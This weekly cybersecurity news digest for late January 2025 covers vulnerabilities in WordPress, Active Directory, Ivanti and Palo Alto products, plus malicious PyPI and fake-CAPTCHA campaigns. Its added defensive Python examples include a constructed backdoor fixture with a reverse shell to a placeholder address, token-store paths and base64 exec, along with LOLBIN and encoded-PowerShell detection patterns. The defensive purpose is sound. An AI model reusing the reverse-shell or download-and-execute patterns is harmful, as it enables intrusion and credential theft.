Weekly Cyber Security News Digest 20-26 January
W3 Total Cache plugin bug exposes over 1 million WordPress sites to attacks
Over a million WordPress websites are at risk due to a high-severity vulnerability in the popular W3 Total Cache plugin.
W3 Total Cache is used to boost website performance and improve search engine optimization.
The vulnerability (CVE-2024-12365, CVSS score: 8.5) can allow attackers to gain unauthorized access to sensitive data and even launch attacks on internal systems. The flaw is due to a missing authorization check in the plugin’s code, which allows authenticated users with minimal privileges (Subscriber level and above) to perform actions they should not be able to.
Exploitation of CVE-2024-12365 could lead to:
- Server-Side Request Forgery (SSRF): make web requests that could potentially expose sensitive data, including instance metadata on cloud-based apps.
- Information disclosure: attackers can gain access to confidential data stored within the WordPress site.
- Service abuse: consume cache service limits, which impacts site performance and can generate increased costs.
The flaw affects websites running W3 Total Cache version 2.8.1 or earlier. Website owners using W3 Total Cache should update to the latest patched version (2.8.2) as soon as possible.
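The SSRF consequence above hinges on the plugin fetching a URL on behalf of a low-privileged user, so a server-side fetcher needs two checks the plugin evidently lacked: an authorization check on the caller and a destination check on the URL. The following is an added example in Python (not W3 Total Cache's code, which is PHP) of the destination check: it resolves the host, rejects any URL whose address falls in loopback, private, link-local or the cloud metadata range, and hands back the resolved addresses so the caller connects to exactly what was checked. The resolver is injected; the `FAKE_DNS` table is constructed sample data, not real records.

```python
import ipaddress
from urllib.parse import urlsplit

# Destinations a server-side fetcher must never reach. 169.254.0.0/16 covers the
# cloud instance-metadata endpoint (169.254.169.254); the rest are loopback,
# RFC 1918, carrier-grade NAT and IPv6 local ranges.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_blocked_ip(ip_str):
    """True if the address lies in a blocked range (IPv4-mapped IPv6 is unwrapped)."""
    ip = ipaddress.ip_address(ip_str)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_fetch_target(url, resolve):
    """Validate a user-supplied URL before fetching it server-side.

    resolve(host) -> list of IP strings (injected; in production wrap
    socket.getaddrinfo). Returns (ok, detail, addrs). The caller should connect
    to one of `addrs` rather than re-resolving, so a DNS answer that changes
    between check and use (rebinding) cannot slip a blocked address through.
    Checking the *resolved* addresses also catches odd spellings such as
    decimal or octal IPs that a resolver would happily turn into 127.0.0.1.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed", []
    host = parts.hostname
    if not host:
        return False, "URL has no host", []
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL", []
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP in the URL
    except ValueError:
        try:
            addrs = list(resolve(host))
        except Exception as exc:                    # NXDOMAIN, timeout, ...
            return False, f"resolution of {host} failed: {exc}", []
        if not addrs:
            return False, f"{host} did not resolve", []
    # Every answer is checked: a host that resolves to one public and one
    # internal address is rejected outright.
    for addr in addrs:
        if is_blocked_ip(addr):
            return False, f"{host} -> {addr} is in a blocked range", []
    return True, "ok", addrs


# Constructed DNS answers so the example runs offline (hypothetical names, not real records).
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.attacker.test": ["203.0.113.10", "10.0.0.5"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])


if __name__ == "__main__":
    for u in ("https://example.com/cache/img.png",
              "http://169.254.169.254/latest/meta-data/",
              "http://metadata.internal/",
              "http://rebind.attacker.test/",
              "http://[::ffff:169.254.169.254]/",
              "file:///etc/passwd"):
        print(u, "->", check_fetch_target(u, fake_resolve)[:2])
```

The allow-list of schemes and the post-resolution check are the two pieces that matter; a check on the URL string alone is bypassed by hostnames that resolve to internal addresses, by IPv4-mapped IPv6 literals, and by alternate numeric forms of an address.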
Flaw in Active Directory Group Policy could allow NTLMv1 restriction bypass
An Active Directory (AD) group policy designed to disable NTLMv1 has been found to be insufficient and could allow an attacker to use NTLMv1 authentication even when it is supposed to be disabled. Microsoft has for many years recommended to users that NTLMv1 should be disabled due to security risks posed by the dated protocol. As part of efforts by Microsoft to move users away from NTLMv1, it recommended AD users implement a group policy meant to disable the use of NTLMv1 and urged users to move to better alternatives such as Kerberos.
Recently, researchers have found that in certain circumstances, an attacker could potentially create a situation where NTLMv1 will be used even with the group policy in place if an application allows the use of NTLMv1 and an NTLMv1 message is received from a non-Windows client.
Microsoft was informed of the issue by the researchers but does not consider it a vulnerability and intends to address it through its continuing efforts to remove NTLMv1 from its operating systems. The researchers recommend that concerned organizations take precautions with a number of steps, including:
- Enable audit logging for NTLM authentication on the domain
- Map the applications that use NTLM, either directly or as a fallback
- Find vulnerable applications that require clients to send NTLMv1 messages
- Move to modern authentication methods
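The first two steps above produce data that has to be read: once NTLM auditing is on, the host that accepts a logon writes a Security event 4624 whose "Detailed Authentication Information" section names the package ("NTLM") and, in the "Package Name (NTLM only)" field, the version ("NTLM V1" or "NTLM V2"). The following added Python example (not from the Silverfort or Microsoft articles) parses that message text, flags the NTLMv1 logons and tallies them per source so the clients or applications still sending NTLMv1 can be mapped. The four events are constructed samples with only the fields the check needs; tabs in the real rendering are shown as spaces.

```python
import re
from collections import Counter

# Constructed sample: message text of four Security-log event 4624 records.
SAMPLE_EVENTS = [
"""An account was successfully logged on.
Logon Type:         3
New Logon:
    Account Name:       svc_backup
    Account Domain:     CORP
Network Information:
    Workstation Name:   NAS01
    Source Network Address: 10.1.2.3
Detailed Authentication Information:
    Logon Process:      NtLmSsp
    Authentication Package: NTLM
    Package Name (NTLM only):   NTLM V1
""",
"""An account was successfully logged on.
Logon Type:         3
New Logon:
    Account Name:       alice
    Account Domain:     CORP
Network Information:
    Workstation Name:   WS-042
    Source Network Address: 10.1.7.21
Detailed Authentication Information:
    Logon Process:      NtLmSsp
    Authentication Package: NTLM
    Package Name (NTLM only):   NTLM V2
""",
"""An account was successfully logged on.
Logon Type:         3
New Logon:
    Account Name:       bob
    Account Domain:     CORP
Network Information:
    Workstation Name:   WS-007
    Source Network Address: 10.1.7.30
Detailed Authentication Information:
    Logon Process:      Kerberos
    Authentication Package: Kerberos
    Package Name (NTLM only):   -
""",
"""An account was successfully logged on.
Logon Type:         3
New Logon:
    Account Name:       svc_backup
    Account Domain:     CORP
Network Information:
    Workstation Name:   NAS01
    Source Network Address: 10.1.2.3
Detailed Authentication Information:
    Logon Process:      NtLmSsp
    Authentication Package: NTLM
    Package Name (NTLM only):   NTLM V1
""",
]

_LINE = re.compile(r"^(\s*)(.+?):\s*(.*)$")
AUTH = "Detailed Authentication Information"


def parse_event(text):
    """Flatten an event message into {'Section/Field': value}. Top-level fields
    such as 'Logon Type' carry no section prefix; an unindented 'Name:' line
    with no value opens a section."""
    fields, section = {}, None
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        indent, key, value = m.groups()
        if not value and not indent:
            section = key
            continue
        fields[f"{section}/{key}" if section else key] = value.strip()
    return fields


def find_ntlmv1_logons(event_texts):
    """Return one record per logon that was validated with NTLMv1."""
    hits = []
    for text in event_texts:
        ev = parse_event(text)
        if ev.get(f"{AUTH}/Authentication Package") != "NTLM":
            continue
        if ev.get(f"{AUTH}/Package Name (NTLM only)") != "NTLM V1":
            continue
        hits.append({
            "user": f"{ev.get('New Logon/Account Domain', '?')}\\{ev.get('New Logon/Account Name', '?')}",
            "workstation": ev.get("Network Information/Workstation Name", "?"),
            "source_ip": ev.get("Network Information/Source Network Address", "?"),
            "logon_type": ev.get("Logon Type", "?"),
        })
    return hits


def ntlmv1_sources(hits):
    """Count NTLMv1 logons per (workstation, IP): the raw material for the
    'map applications that use NTLM' step."""
    return Counter((h["workstation"], h["source_ip"]) for h in hits)


if __name__ == "__main__":
    found = find_ntlmv1_logons(SAMPLE_EVENTS)
    for src, n in ntlmv1_sources(found).most_common():
        print(f"{src[0]} ({src[1]}): {n} NTLMv1 logon(s)")
```

Run this over an export from every server that accepts NTLM logons, not only the domain controllers, because the version field is written by the host that processed the logon. In the sample, only the NAS is still negotiating NTLMv1, which is exactly the non-Windows client case the researchers describe.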
Python developers targeted with fake Discord library on PyPI
Hundreds of Python developers may have fallen victim to a fake Python package called “pycord-self”. The fake library was available on the official Python Package Index (PyPI) for several months from mid-2024 and was made to look like the legitimate library “discord.py-self”.
The fake library, which has amassed over 800 downloads, mimics the original legitimate library that offers developers a handy library of functions for managing interactions with Discord accounts and is frequently used for automating functions on Discord channels such as bots, moderation of content, and other tasks. However, if an unsuspecting developer downloads the malicious library instead of the legitimate one, they may find that they got more than they bargained for. Included within the malicious library is code that attempts to steal authentication tokens. It can also open a backdoor connection to a remote server on TCP port 6969, allowing the attacker to launch a remote shell to the compromised computer.
Developers are urged to carefully check libraries before use, even on official sources such as the PyPI package index, as attackers frequently target Python developers with fake libraries using package names similar to official libraries.
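"Carefully check libraries before use" is easier with something that reads the code for you. The behaviour described above, token theft plus a reverse shell to a hard-coded port, shows up as concrete patterns in the source: a socket connected to a literal host and port, a subprocess started with a shell attached to that socket, `exec()` fed from a decoder, and string literals naming browser or Electron token stores. The following added Python example (my own scanner, not tooling from PyPI or the reporting researchers) walks a module's AST for those patterns. The malicious module it scans is a constructed sample written to resemble the reported behaviour, not the actual `pycord-self` code.

```python
import ast
import pathlib

TOKEN_STORE_HINTS = ("Local Storage", "leveldb")   # Electron/Chromium token storage
DECODERS = {"b64decode", "a85decode", "decompress", "unhexlify"}
SHELL_FUNCS = {"Popen", "call", "run", "check_output", "check_call", "system"}


def _func_name(call):
    """Last component of the called name: sock.connect -> 'connect'."""
    f = call.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def scan_source(source, filename="<module>"):
    """Return sorted (line, rule, detail) findings for stealer/backdoor patterns."""
    tree = ast.parse(source, filename)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _func_name(node)
            # sock.connect((host, port)) with both values hard-coded
            if name == "connect" and node.args:
                a = node.args[0]
                if (isinstance(a, ast.Tuple) and len(a.elts) == 2
                        and all(isinstance(e, ast.Constant) for e in a.elts)):
                    findings.append((node.lineno, "hardcoded-socket",
                                     f"connect to {a.elts[0].value}:{a.elts[1].value}"))
            # subprocess.*(..., shell=True) or os.system(...)
            if name in SHELL_FUNCS:
                shell = any(k.arg == "shell" and isinstance(k.value, ast.Constant)
                            and k.value.value is True for k in node.keywords)
                if shell or name == "system":
                    findings.append((node.lineno, "shell-exec", f"{name}() with a shell"))
            # exec()/eval() whose argument tree contains a decoder call
            if name in ("exec", "eval") and any(
                    isinstance(n, ast.Call) and _func_name(n) in DECODERS
                    for n in ast.walk(node)):
                findings.append((node.lineno, "obfuscated-exec", f"{name}() on decoded payload"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if all(h in node.value for h in TOKEN_STORE_HINTS):
                findings.append((node.lineno, "token-store-path", node.value))
    return sorted(findings)


def scan_tree(root):
    """Scan every .py file under an unpacked sdist/wheel; {relative path: findings}."""
    root = pathlib.Path(root)
    return {str(p.relative_to(root)): f
            for p in root.rglob("*.py") if (f := scan_source(p.read_text(), str(p)))}


# Constructed sample resembling a backdoored module (NOT the real pycord-self code).
MALICIOUS_SAMPLE = r'''
import base64, os, socket, subprocess

TOKEN_DIRS = [r"%APPDATA%\discord\Local Storage\leveldb",
              r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Storage\leveldb"]

def _beacon():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("203.0.113.7", 6969))
    subprocess.Popen("cmd.exe", shell=True, stdin=s.fileno(),
                     stdout=s.fileno(), stderr=s.fileno())

exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
'''

# Constructed benign module for comparison.
BENIGN_SAMPLE = '''
import json, urllib.request

def fetch(url):
    with urllib.request.urlopen(url) as r:
        return json.load(r)
'''

if __name__ == "__main__":
    for line, rule, detail in scan_source(MALICIOUS_SAMPLE):
        print(f"line {line}: {rule}: {detail}")
    print("benign:", scan_source(BENIGN_SAMPLE))
```

This is a triage aid, not a verdict: legitimate network libraries connect to sockets and build tools do spawn shells. What should never appear in a Discord client library is the combination seen here, and `pip download` followed by `scan_tree()` on the unpacked archive surfaces it before anything is installed.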
OpenAI’s ChatGPT crawler could be used to carry out DDoS attacks
A flaw in ChatGPT’s web crawler could be exploited by an attacker to carry out a distributed denial-of-service (DDoS) attack on targets chosen by the attacker.
New research found that by simply sending a specially crafted HTTP POST request, without any authentication, containing thousands of URLs to the chatgpt[.]com/backend-api/attributions API endpoint, an attacker could cause the OpenAI backend to initiate thousands of simultaneous and repeated requests to the specified URLs, which could ultimately overwhelm resources at the targeted site. Victims at the receiving end of such a DDoS attack would see a large number of requests coming from ChatGPT via many different IP addresses and may find it difficult to mitigate the attack.
The researcher points to a failure to limit the number of URLs that can be specified in a request, and the lack of authentication, as the factors enabling such attacks. The issue was reported to OpenAI by the researcher, who has yet to receive a response.
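Both contributing factors are server-side input-handling decisions. The following added Python example (not OpenAI's code; the endpoint's internals are not public) shows the controls a crawler-triggering endpoint should apply before any fetch is scheduled: canonicalise the submitted URLs so spellings of the same target collapse, drop duplicates, cap the fan-out per host, reject an oversized batch outright rather than trimming it, and rate-limit each authenticated caller with a token bucket. The limits and the sample request bodies are illustrative values chosen for the example.

```python
import time
from collections import Counter
from urllib.parse import urlsplit, urlunsplit


class BatchTooLarge(ValueError):
    """Raised for an oversized batch; the request is rejected, not trimmed."""


def canonical(url):
    """Normalise a URL so trivially different spellings of one target (case,
    fragment, default port) collapse to a single string; None if not http(s)."""
    p = urlsplit(url.strip())
    scheme = p.scheme.lower()
    try:
        port = p.port            # raises ValueError on a malformed port
    except ValueError:
        return None
    if scheme not in ("http", "https") or not p.hostname:
        return None
    host = p.hostname
    if ":" in host:              # bare IPv6 literal from .hostname, re-bracket it
        host = f"[{host}]"
    default = 80 if scheme == "http" else 443
    if port is not None and port != default:
        host = f"{host}:{port}"
    return urlunsplit((scheme, host, p.path or "/", p.query, ""))


def select_fetch_targets(urls, max_urls=20, max_per_host=2):
    """Apply batch limits; returns (accepted canonical URLs, [(raw, reason)])."""
    if len(urls) > max_urls:
        raise BatchTooLarge(f"{len(urls)} URLs submitted, limit is {max_urls}")
    seen, per_host, accepted, dropped = set(), Counter(), [], []
    for raw in urls:
        c = canonical(raw)
        if c is None:
            dropped.append((raw, "unsupported URL"))
            continue
        if c in seen:
            dropped.append((raw, "duplicate"))
            continue
        host = urlsplit(c).hostname
        if per_host[host] >= max_per_host:
            dropped.append((raw, f"per-host limit reached for {host}"))
            continue
        seen.add(c)
        per_host[host] += 1
        accepted.append(c)
    return accepted, dropped


class TokenBucket:
    """Per-caller rate limit: `capacity` fetches at once, refilled at `rate` per
    second. The clock is injectable so the behaviour can be tested offline."""

    def __init__(self, capacity, rate, clock=time.monotonic):
        self.capacity, self.rate, self.clock = capacity, rate, clock
        self._state = {}         # key -> (tokens, last refill time)

    def allow(self, key, cost=1):
        now = self.clock()
        tokens, last = self._state.get(key, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.rate)
        if tokens < cost:
            self._state[key] = (tokens, now)
            return False
        self._state[key] = (tokens - cost, now)
        return True


if __name__ == "__main__":
    # Constructed request body: one target under a thousand query-string variants.
    flood = [f"https://victim.example/page?x={i}" for i in range(1000)]
    try:
        select_fetch_targets(flood)
    except BatchTooLarge as e:
        print("rejected:", e)
    mixed = ["https://Victim.example/#a", "https://victim.example:443/",
             "https://victim.example/other", "https://victim.example/third",
             "https://other.example/", "ftp://x/"]
    print(select_fetch_targets(mixed))
    bucket = TokenBucket(capacity=3, rate=1.0)
    print([bucket.allow("api-key-1") for _ in range(4)])
```

Rejecting the oversized batch rather than taking the first N is deliberate: partial service of an abusive request still does the attacker's work. The per-host cap is what turns "thousands of requests to one site" into "two", whatever the batch size.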
Oracle patches 318 bugs in multiple products
Oracle’s January 2025 Critical Patch Update (CPU) sees the technology firm issue fixes for 318 vulnerabilities across its range of products and services.
One of the most severe vulnerabilities is a bug in the Oracle Agile Product Lifecycle Management (PLM) Framework. CVE-2025-21556 (CVSS score: 9.9) could allow an attacker to seize control of susceptible instances. The “easily exploitable vulnerability allows low privileged attackers with network access via HTTP to compromise Oracle Agile PLM Framework,” according to a description of the flaw in the NIST National Vulnerability Database (NVD).
CISA and FBI detail Ivanti exploit chains
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) on Wednesday (January 22) released technical details of exploit chains used by Chinese state-backed hackers to compromise Ivanti Cloud Service Appliances (CSA) in September 2024.
The agencies released indicators of compromise (IOCs) and other forensic data from cleanup operations and warned that four documented security flaws are providing an array of opportunities for threat actors linked to the Chinese government.
The vulnerabilities used in the attacks include:
- CVE-2024-8963, an administrative bypass vulnerability
- CVE-2024-9379, a SQL injection vulnerability
- CVE-2024-8190 and CVE-2024-9380, two remote code execution vulnerabilities
The threat actors used two main exploit chains and some lateral movement techniques to break into computer systems, perform remote code execution, harvest credentials, and implant web shells on victim networks. One exploit chain combined CVE-2024-8963, CVE-2024-8190, and CVE-2024-9380, while the other paired CVE-2024-8963 with CVE-2024-9379.
Cloudflare’s CDN could be used to track users’ general location
Daniel, a self-described 15-year-old schoolboy hacker, recently discovered that Cloudflare’s CDN infrastructure can be abused by those who wish to track the movements of individuals. The technique reveals a user’s general location to within roughly a 250-mile radius. This is possible because, according to Daniel, Cloudflare’s CDN caches content such as images and videos at the data center closest to the user requesting the content, in order to improve website performance.
However, this targeted caching also ends up inadvertently revealing some information about the requester of the data. As the report by Daniel mentions, information returned in HTTP headers from Cloudflare may reveal information about the datacenters’ location and indirectly, the fact that the user is located within range of the serving data center.
To locate a user, an attacker could target a privacy-focused chat app such as Signal and send the user a unique attachment, such as an image, which would subsequently be cached by Cloudflare. The attacker would then use a custom tool called Cloudflare Teleport to force requests through various data centers in search of the cached image. By enumerating the data centers until the cached copy is found, the attacker learns roughly where the user they wish to track is located.
Cloudflare for its part has indicated that the issues used to carry out these types of attacks have now been resolved. Daniel was awarded a $200 bug bounty for his troubles.
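The enumeration step above reads two documented Cloudflare response headers: `cf-ray`, whose suffix is the three-letter code of the data center that served the response, and `cf-cache-status`, which says whether that data center already had the object (`HIT`) or had to fetch it (`MISS`). The following is an added Python example of that inference and of the response property that prevents it; it is not Daniel's tool, and whether his tool relied on exactly these headers is an assumption. The probe responses are constructed samples.

```python
import re

# cf-ray: "<16 hex chars>-<IATA-style code of the serving data center>"
_CF_RAY = re.compile(r"^[0-9a-f]{16}-([A-Z]{3})$", re.I)


def _lower(headers):
    return {k.lower(): v for k, v in headers.items()}


def serving_colo(headers):
    """Data-center code from a Cloudflare response, or None if absent/malformed."""
    m = _CF_RAY.match(_lower(headers).get("cf-ray", "").strip())
    return m.group(1).upper() if m else None


def cache_status(headers):
    return _lower(headers).get("cf-cache-status", "").upper()


def locate_cached_object(probe_responses):
    """probe_responses: {colo requested through: response headers} for the same
    URL. Returns the data centers that already held the object, i.e. the ones
    that served it to whoever fetched the attachment first."""
    return sorted(colo for colo, hdrs in probe_responses.items()
                  if cache_status(hdrs) == "HIT" and serving_colo(hdrs) == colo)


def cacheable_by_cdn(origin_headers):
    """False when the origin marks the response private or no-store, in which
    case the CDN never stores it and the probe can never see a HIT. Per-recipient
    attachments should be served this way."""
    directives = {d.strip().lower()
                  for d in origin_headers.get("Cache-Control", "").split(",")}
    return not ({"private", "no-store"} & directives)


# Constructed probe results: the same attachment URL requested via three colos.
PROBES = {
    "SJC": {"cf-ray": "8a1b2c3d4e5f6789-SJC", "cf-cache-status": "HIT"},
    "LHR": {"cf-ray": "8a1b2c3d4e5f678a-LHR", "cf-cache-status": "MISS"},
    "SIN": {"cf-ray": "8a1b2c3d4e5f678b-SIN", "cf-cache-status": "MISS"},
}

if __name__ == "__main__":
    print("object was already cached at:", locate_cached_object(PROBES))
    print("leaky:", cacheable_by_cdn({"Cache-Control": "public, max-age=31536000"}))
    print("safe: ", cacheable_by_cdn({"Cache-Control": "private, no-store"}))
```

A `MISS` in the probe itself populates that data center's cache, so each colo can only be tested once per unique object; that is why the attack needs a fresh attachment per target.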
Multiple ABB products affected by over 1,000 vulnerabilities, claims researcher
Last year, a security researcher known as Gjoko Krstic, who specializes in building management and access control systems, began to take a closer look at the offerings in this category from industrial giant ABB. During his investigation, he discovered that multiple products, such as ASPECT, MATRIX, and NEXUS, suffered from a large number of different vulnerabilities said to total over 1,000. Krstic shared details of the vulnerabilities with the company in 2024.
After several months, ABB finally published its advisory in January 2025 but with details of only 26 vulnerabilities (CVEs), covering a broad spectrum of vulnerability types such as remote code execution, SQL injection, file upload, credential exposure, denial of service, path traversal, cross-site scripting, etc.
In recent reports in the media, the disgruntled researcher responded to ABB’s efforts by claiming that the vendor silently patched many of the issues and that the number of vulnerabilities should have been far higher. In the ASPECT product alone, the researcher claims to have found over a thousand vulnerabilities, many of which would be considered critical or high severity. Another product called ABB Cylon FLXeon, which was not mentioned in the ABB advisory, is said to have at least 35 vulnerabilities.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published its own ICS advisory on the matter, providing advice to users on patches to install and mitigation measures to implement. Users of ABB products should check CISA’s and ABB’s advisories for details of impacted systems and steps to take.
Researchers find Palo Alto firewalls affected by multiple vulnerabilities
Researchers who specialize in the analysis of security appliances shared information about what is being called a Pandora’s Box of vulnerabilities found in a number of Palo Alto network appliances.
To carry out the research, the researchers bought a number of Palo Alto appliances (models PA-3260, PA-1410, and PA-415). On detailed examination, the devices were found to be affected by many different vulnerabilities, most of them several years old. The newest issues found in the devices are an authentication bypass vulnerability in the management web interface, CVE-2024-0012 (CVSS score: 9.8), and a privilege escalation vulnerability in the management web interface, CVE-2024-9475 (CVSS score: 4.9), both of which were fixed in November 2024.
Some of the other attention-grabbing vulnerabilities found in the appliances include ones that could enable an attacker to tamper with the boot process of the appliance.
- The “BootHole” issue, CVE-2020-10713 (CVSS score: 8.2), affects all the appliances checked; it is a buffer overflow in the GRUB2 bootloader that can allow a Secure Boot bypass on Linux systems.
- Multiple CVEs affect Insyde Software’s InsydeH2O UEFI firmware used by the PA-3260 appliance; these could allow privilege escalation and Secure Boot bypass.
- “LogoFAIL”, a set of UEFI image-parser flaws disclosed in 2023, could be exploited by an attacker with a specially crafted boot logo image to execute code during the boot process.
The researchers communicated their findings to Palo Alto in November 2024 but due to an unsatisfactory response from the company, they decided to go public with the information, citing a need for users to be aware of the risks of using these products. Palo Alto for its part has stated that “the scenarios required for successful exploitation do not exist on up-to-date PAN-OS software under normal conditions with secured management interfaces deployed according to best practice guidelines.” The company said it will continue to work with third-party vendors on any mitigations, if necessary.
Users of QNAP NAS devices are advised to check for necessary updates
QNAP has patched six rsync vulnerabilities in its HBS 3 Hybrid Backup Sync software, which is used for data backup and disaster recovery on its network-attached storage (NAS) devices.
NAS and other internet-connected devices are frequently targeted by attackers, so users of QNAP products running HBS 3 Hybrid Backup Sync versions prior to 25.1.4.952 are urged to update immediately to mitigate the risk of attack.
New fake CAPTCHA campaign aims to distribute Lumma Stealer malware
Researchers have warned about a new malware campaign that uses fake CAPTCHA verification checks to distribute the Lumma information-stealing malware.
The attack is said to be targeting users in multiple countries, with Argentina, Colombia, the U.S. and the Philippines most affected. The most frequently targeted industries include telecommunications, healthcare, banking, and marketing.
The attack chain for this campaign typically involves the user visiting a compromised website. There they are sent to a fake CAPTCHA page where they are instructed to copy and paste a command into the Windows Run dialog in order to pass the challenge.
The command leads to the execution of a malicious script that downloads further stages of the attack chain, which ultimately results in the download and installation of the Lumma Stealer malware.
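The chain above has a distinctive shape in process telemetry: `explorer.exe` (the Run dialog's host) spawns an interpreter or downloader whose command line carries a remote URL, an encoded PowerShell command, a hidden-window flag or a download-and-execute idiom, none of which a person normally types into Run. The following added Python example (my own detection logic, not from the cited reports) scores Sysmon event 1 / Security 4688 style process-creation records on that pattern, decoding `-EncodedCommand` payloads so indicators hidden in base64 are matched too. The five events are constructed samples; the URL in them is a placeholder, not a real campaign domain.

```python
import base64
import re

# Interpreters and downloaders a Run-dialog paste typically hands the payload to.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "msiexec.exe", "curl.exe", "certutil.exe",
           "bitsadmin.exe", "regsvr32.exe"}

# Things a human typing into Run does not normally need.
INDICATORS = {
    "remote-url":      re.compile(r"https?://", re.I),
    "encoded-command": re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand|c)?(?:\s|$)", re.I),
    "hidden-window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download-exec":   re.compile(r"\biex\b|invoke-expression|downloadstring|frombase64string", re.I),
}
_ENC_ARG = re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """PowerShell -enc takes base64 of UTF-16LE text; return it decoded, or ''."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def assess_process_event(ev):
    """Return (alert, matched indicator names) for one process-creation event."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    text = cmd + "\n" + decode_encoded_command(cmd)
    matched = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # The fake-CAPTCHA chain is explorer.exe (Run dialog) spawning an interpreter
    # with a remote/obfuscated payload. An admin console spawning the same thing
    # is a different (noisier) rule and is deliberately out of scope here.
    alert = parent == "explorer.exe" and image in LOLBINS and bool(matched)
    return alert, matched


def find_fake_captcha_launches(events):
    hits = []
    for ev in events:
        alert, matched = assess_process_event(ev)
        if alert:
            hits.append((ev.get("ProcessId"), ev.get("Image"), matched))
    return hits


# Constructed sample events (placeholder domain, not a real campaign indicator).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-verify.example/check.hta"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgA"},   # SQBFAFgA = "IEX" in UTF-16LE
    {"ProcessId": 4300, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad notes.txt"},
    {"ProcessId": 4402, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
    {"ProcessId": 4510,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, image, matched in find_fake_captcha_launches(SAMPLE_EVENTS):
        print(f"PID {pid}: {image} -> {', '.join(matched)}")
```

The parent-process condition is what keeps this quiet on an estate: plain `cmd /c dir` from Explorer and a scheduled PowerShell script from a console both score nothing. Corroborating artefacts worth pulling when it fires are the `RunMRU` registry key (what was pasted into Run) and the user's clipboard history, if enabled.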
The Lumma Stealer malware is a popular malware-as-a-service (MaaS) option frequently chosen by many cybercriminals to carry out various campaigns. It was also recently seen being distributed in a campaign using fake domains impersonating Reddit and WeTransfer.
Sources:
- W3 Total Cache plugin flaw exposes 1 million WordPress sites to attacks
- Active Directory Hardening Series – Part 1 – Disabling NTLMv1 | Microsoft Community Hub
- Think You Blocked NTLMv1? Bypassing NTLM Authentication Is Still Possible | Silverfort
- Malicious PyPi package steals Discord auth tokens from devs
- ChatGPT crawler flaw opens door to DDoS, prompt injection ∙ The Register
- Critical Patch Updates, Security Alerts and Bulletins
- Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications | CISA
- Critical Ivanti Cloud Appliance Vulnerability Exploited in Active Cyberattacks
- Zero-Day Alert: Three Critical Ivanti CSA Vulnerabilities Actively Exploited
- Ivanti Warns of Active Exploitation of Newly Patched Cloud Appliance Vulnerability
- Researcher Says ABB Building Control Products Affected by 1,000 Vulnerabilities – SecurityWeek
- ABB ASPECT-Enterprise, NEXUS, and MATRIX Series Products | CISA
- Palo Alto Firewalls Found Vulnerable to Secure Boot Bypass and Firmware Exploits
- QNAP fixes six Rsync vulnerabilities in NAS backup, recovery app
- Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks
- Hundreds of fake Reddit sites push Lumma Stealer malware